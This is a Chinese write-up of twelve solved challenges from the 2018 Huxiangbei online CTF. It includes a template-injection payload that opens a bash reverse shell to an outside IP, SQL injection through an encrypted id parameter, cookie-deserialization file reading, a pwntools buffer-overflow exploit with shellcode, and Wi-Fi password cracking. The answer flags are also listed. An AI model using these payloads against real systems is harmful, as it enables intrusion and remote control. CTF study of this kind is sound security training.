湖湘杯 2018 线上CTF WriteUp

admin 2021年9月15日09:47:08评论193 views字数 9974阅读33分14秒阅读模式

共 15 题,解出 12 题。

比赛平台入口地址:http://hxb.erangelab.com/

Welcome - SingIn - 50pt

关注合天智汇公众号,回复hxb2018获得flag
http://hxb2018.oss-cn-beijing.aliyuncs.com/heetian.jpg

hxb2018{W3lc0me_T0_Hxb2o18}

Web - XmeO - 150pt

管理员的flag在哪里?
47.107.235.223:9990

注册帐号,登录,提交 Todo List,然后点 Show,存在模板注入漏洞

{{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('echo "bash -i >& /dev/tcp/222.85.25.45/5555 0>&1">/tmp/xx1x1') }}

{{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('bash /tmp/xx1x1') }}

拿到 Shell 后全局搜索 Flag,关键词 hxb

Flag: hxb2018{510243761ff63759ed7fe96ca2759e45}

Web - Code Check - 200pt

code check
120.79.246.58:49882

源码 news 目录下 list.php

源码泄漏:http://120.79.246.58:49882/news/list.zip

<?php
header('content-type:text/html;charset=utf-8');
require_once '../config.php';
//解密过程
function decode($data){
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
        mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
        $data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
        mcrypt_generic_deinit($td);
        mcrypt_module_close($td);
        if(substr(trim($data),-7)!=='hxb2018'){
                echo '<script>window.location.href="/index.php";</script>';
        }else{
                return substr(trim($data),0,strlen(trim($data))-7);
        }
}
$id=decode($_GET['id']);
$sql="select id,title,content,time from notice where id=$id";
$info=$link->query($sql);
$arr=$info->fetch_assoc();
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>X公司HR系统V1.0</title>
<style>.body{width:600px;height:500px;margin:0 auto}.title{color:red;height:60px;line-height:60px;font-size:30px;font-weight:700;margin-top:75pt;border-bottom:2px solid red;text-align:center}.content,.title{margin:0 auto;width:600px;display:block}.content{height:30px;line-height:30px;font-size:18px;margin-top:40px;text-align:left;color:#828282}</style>
</head>
<body>
<div class="body">
<div class="title"><?php echo $arr['title']?></div>
<div class="content"><?php echo $arr['content']?></div>
</body>

Encoder

<?php 
function encode($data){
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
        mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
        $da = mcrypt_generic($td,$data);
        mcrypt_generic_deinit($td);
        mcrypt_module_close($td);
        return base64_encode(base64_encode($da));
}

推测注入,id 加密过

http://120.79.246.58:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZ0

databases:
    information_schema,mozhe_discuz_stormgroup,mysql,test

mozhe_discuz_stormgroup:
    notice,notice2,stormgroup_member

notice:
    id,title,content,time

notice2:
    id,title

stormgroup_member:
    id,name,password,status

构造:

var_dump(encode("0 union select 1,(select group_concat(title) from notice2),3,4hxb2018"));
http://120.79.246.58:49882/news/list.php?id=K3hId1N2UVpNcjFENkFja0FtMHdrM0pscGduTzFNZk1uZzVVVVdLK2hjbDVqUTBhOFl6b29YOFA1amZ5R3NUeVZOdDdOZ2luNmZMaXV4bmNRZVd1Yi9CV2hmaGJTbUdJTjJrdndKQjBEam89

Flag: hxb2018{088425ca08783233bbe9d21a3015f5f6}

Web - MyNote - 350pt

Cookie 反序列化

Warning: file_get_contents(./upload/9dd4e461268c8034f5c8564e155c67a6/1.php): failed to open stream: No such file or directory in /var/www/html/views/Views.php on line 65
<?php
$b=array("../../flag.php");
var_dump(serialize($b));
var_dump(base64_encode(serialize($b)));
unserialize(serialize($b));
cookie YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=
PD9waHAKCiRmbGFnID0gImh4YjIwMTh7ODNmMmVhMDBiOTczNWQyYTQ1ZjMxNGJmMmViZmVhZTB9IjsKZWNobyAiZmxhZ3tUaGlzX2ZsYWdfaVNfQV9GNGtlX2ZsYWd9IjsKCg==
<?php

$flag = "hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}";
echo "flag{This_flag_iS_A_F4ke_flag}";

Flag: hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}

Misc - Flow - 200pt

流量取证,这个流量包中隐藏着一些秘密,你能找出来吗?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/flow_6D1210D1307A67E4A428602F722E6803.zip

打开全是 802.11 包

上 aircrack-ng 破解密码

可以知道,SSID 是 ctf,密码是 password1

使用 Wireshark 的自动解密功能

然后过滤器使用 http 即可看到 flag

Flag: flag{H4lf_1s_3n0ugh}

Reverse - HighwayHash64 - 300pt

口算哈希说的就是你吧~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/reverse_1CE475F54D2A3264A8ED743FDFEF24A8.zip

sub_1400017A0 为 HighwayHash64 摘要计算

flag 格式:hxb2018{xxxxx}

第一个判断,用来验证 flag 的长度,经过爆破,确定 flag 的长度为 19

第二个判断,用来验证 flag 格式内的值,也可以爆破,来确定 flag 格式内的值

需要注意,计算摘要时用到的默认 Key 被修改了

附上 flag 值爆破脚本:

from highwayhash import *
# https://github.com/kpdemetriou/highwayhash-cffi
# you need to modify sources/highwayhash.c

# void HighwayHashReset(const uint64_t key[4], HighwayHashState* state) {
#   state->mul0[0] = 0x1BE6D5D5FE4CCE2Full;
#   state->mul0[1] = 0x24093822299F31D0ull;
#   state->mul0[2] = 0x33198A2E03707344ull;
#   state->mul0[3] = 0x443F6A8885A308D3ull;
#   state->mul1[0] = 0x5BD39E10CB0EF593ull;
#   state->mul1[1] = 0x60ACF169B5F18A8Cull;
#   state->mul1[2] = 0x7E5466CF34E90C6Cull;
#   state->mul1[3] = 0x852821E638D01377ull;
#   state->v0[0] = 0xCF0C0C1ED5EDF3E;
#   state->v0[1] = state->mul0[1] ^ 0x3F3E3D3C3B3A1918ull;
#   state->v0[2] = state->mul0[2] ^ 0x1226252423222121ull;
#   state->v0[3] = state->mul0[3] ^ 0x2F2E2D2C2B2A2928ull;
#   state->v1[0] = state->mul1[0] ^ 0x1312111117161514ull;
#   state->v1[1] = state->mul1[1] ^ 0x3B3A19183F3E3D3Cull;
#   state->v1[2] = state->mul1[2] ^ 0x2322212112262524ull;
#   state->v1[3] = state->mul1[3] ^ 0x2B2A29282F2E2D2Cull;
# }

# and then, run `python3 setup.py install` to build & install it

key = b"\x00" * 32

i=0
while True:
    i+=1
    if i%100000==0: print (i/float(10000000000))
    data=str(i)
    data=data.rjust(10,'0')
    data=bytes(data,'ascii')
    op=highwayhash_64(key, data)
    if op==b'\x5a\x54\x30\x87\xaf\x26\xbe\xe3':
        print (i)
        break

爆破得到 flag 格式内的值,应该是一个时间戳

Flag: hxb2018{1532649708}

Reverse - Replace - 300pt

简单的...密码学~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/Replace_B21DA8B2F172C13764989DF0F99B890A.rar

很简单,直接贴上脚本:

r=[
0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
]
t='2a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6'
flag=''
for i in range(35):
    t1=ord(t[2*i])
    t2=ord(t[2*i+1])
    if t1<48 or t1>57:
        t1-=87
    else:
        t1-=48
    if t2<48 or t2>57:
        t2-=87
    else:
        t2-=48
    t1&=0xff
    t2&=0xff
    tmp=(t1*16+t2)^0x19
    tmp&=0xff
    for j in range(len(r)):
        if r[j]==tmp:
            flag+=chr(j)
            break
print flag

Flag: flag{Th1s_1s_Simple_Rep1ac3_Enc0d3}

Crypto - Common Crypto - 200pt

Please enter your flag
http://hxb2018.oss-cn-beijing.aliyuncs.com/crypto/crypto_3ED9C81B3AD33F8ABEA1984B2B69284A.zip

AES 算法,挺简单的。

直接贴脚本:

from Crypto.Cipher import AES

enc='461559ceb56d277df44a31ae89f08a6a33626430326635343563373032383031'.decode('hex')
key='\x1B\x2E\x35\x46\x58\x6E\x72\x86\x9B\xA7\xB5\xC8\xD9\xEF\xFF\x0C'
mode=AES.MODE_ECB
c=AES.new(key,mode,key)
print c.decrypt(enc[:16])+enc[16:]+'}'

Flag: hxb2018{bc69322f3bd02f545c702801}

Reverse - More efficient than JS - 300pt

蓝色的火狐和黄色的谷歌更配哦~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/attach_9550FD3DD9774159E9955E2A0E389842.zip

wasm 文件逆向,可以用 wasmdec 生成伪 c 代码

然后人工分析,可以逆出验证部分的代码

附上解密脚本:

mem_data=[
    0xdf, 0x81, 0x7f, 0x20, 0x07, 0xc4, 0x0d, 0x1c, 0xc9, 0x9e, 0x8e, 0x17, 
    0xd7, 0xed, 0x78, 0x50, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x20, 0x69, 0x6e, 
    0x70, 0x75, 0x74, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x66, 0x6c, 0x61, 
    0x67, 0x3a, 0x0a, 0x00, 0x25, 0x73, 0x00, 0x49, 0x5f, 0x61, 0x6d, 0x5f, 
    0x6b, 0x65, 0x79, 0x00, 0x79, 0x65, 0x73, 0x00, 0x6e, 0x6f, 0x00, 0x69, 
    0x6e, 0x66, 0x69, 0x6e, 0x69, 0x74, 0x79, 0x00, 0x00, 0x01, 0x02, 0x04, 
    0x07, 0x03, 0x06, 0x05, 0x00, 0x2d, 0x2b, 0x20, 0x20, 0x20, 0x30, 0x58, 
    0x30, 0x78, 0x00, 0x28, 0x6e, 0x75, 0x6c, 0x6c, 0x29, 0x00, 0x2d, 0x30, 
    0x58, 0x2b, 0x30, 0x58, 0x20, 0x30, 0x58, 0x2d, 0x30, 0x78, 0x2b, 0x30, 
    0x78, 0x20, 0x30, 0x78, 0x00, 0x69, 0x6e, 0x66, 0x00, 0x49, 0x4e, 0x46, 
    0x00, 0x6e, 0x61, 0x6e, 0x00, 0x4e, 0x41, 0x4e, 0x00, 0x2e, 
]
mem=''
for i in mem_data:
    mem+=chr(i)
key=mem[4475-1024-3408:4475-1024-3408+8]
enc=mem[4432-1024-3408:4432-1024-3408+15]
print key
print enc.encode('hex')

table1=[]
table2=[]

for i in range(256):
    table1.append(i)
    table2.append(ord(key[i%8]))

tmp=0
for i in range(256):
    tmp=(tmp+table1[i]+table2[i])&0xff
    table1[i],table1[tmp]=table1[tmp],table1[i]

flag=''
tmp=0
for i in range(len(enc)):
    c=(i+1)&0xff
    tmp=(tmp+table1[c])&0xff
    table1[c],table1[tmp]=table1[tmp],table1[c]
    flag+=chr(ord(enc[i])^table1[(table1[c]+table1[tmp])&0xff])
print flag

Flag: flag{happy_rc4}

PWN - Regex Format - 350pt

关键点在正则匹配的时候,&s 在栈上可溢出,直接在 bss 写 shellcode ,然后 ROP

贴一下POC:

from pwn import *

#io=process('./pwn1')
io=remote('47.107.172.28',8888)
payload=':a\x08\x04\xa3\x50$*'
io.sendafter('format\n',payload)

shellcode='\x90'*5
shellcode+='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload='Before use it, understand it first.'
payload+='a'*0xd8+p32(0x804a350)+shellcode
io.sendafter('match\n',payload)
print io.sendlineafter('[Y/n]\n','n')

io.interactive()

Flag: hxb2018{214ebb03581966cf32cc351dd233e7fc}

Web - Readflag - 250pt

拿到题,网页提示用 url 参数来 ssrf

查看 header,看到是 apache,直接读配置文件

看到网站根目录下的 php 文件,继续读

源代码里在某个条件下,可以调用 readflag 文件,进而读到 flag

那么直接把 readflag 文件下载下来,逆向一下

可以看到 flag 文件就叫 flag,直接读出来

Flag: hxb2018{0ef0c0d15f1a22b47af2a01669fbf124}

Misc - Disk - 200pt

磁盘隐写,这个磁盘上隐藏着一些秘密,你能找出来吗?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/disk_95ED58BC6E172FABFEE602D4513E2BE7.zip

一个 vmdk 文件,看了一下里面是 NTFS 格式,可以用 RecuperaBit 来分析

分析命令如下:

python main.py ctf-flat.vmdk
[ENTER]
recoverable
tree 0

可以看到有 flag0.txt / flag1.txt / flag2.txt / flag3.txt 4个文件,里面都写着 flag is not here.

另外还能看到,这四个文件有 ads 流,所以隐藏数据应该在这里

用下面的命令逐个导出:

restore 0 33:ads
restore 0 34:ads
restore 0 35:ads
restore 0 36:ads

在默认输出 recuperabit_output 文件夹里可以看到,四个已经导出的 ads 流文件

4 个文件里都是 10 组成的二进制字符,将 4 个文件里的内容顺序拼接,然后二进制转换成字符串,就能得到 flag 了

Flag: flag{4DS_1n_D1sk}

Source: impakho.com | Author:impakho

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月15日09:47:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   湖湘杯 2018 线上CTF WriteUphttp://cn-sec.com/archives/543926.html

发表评论

匿名网友 填写信息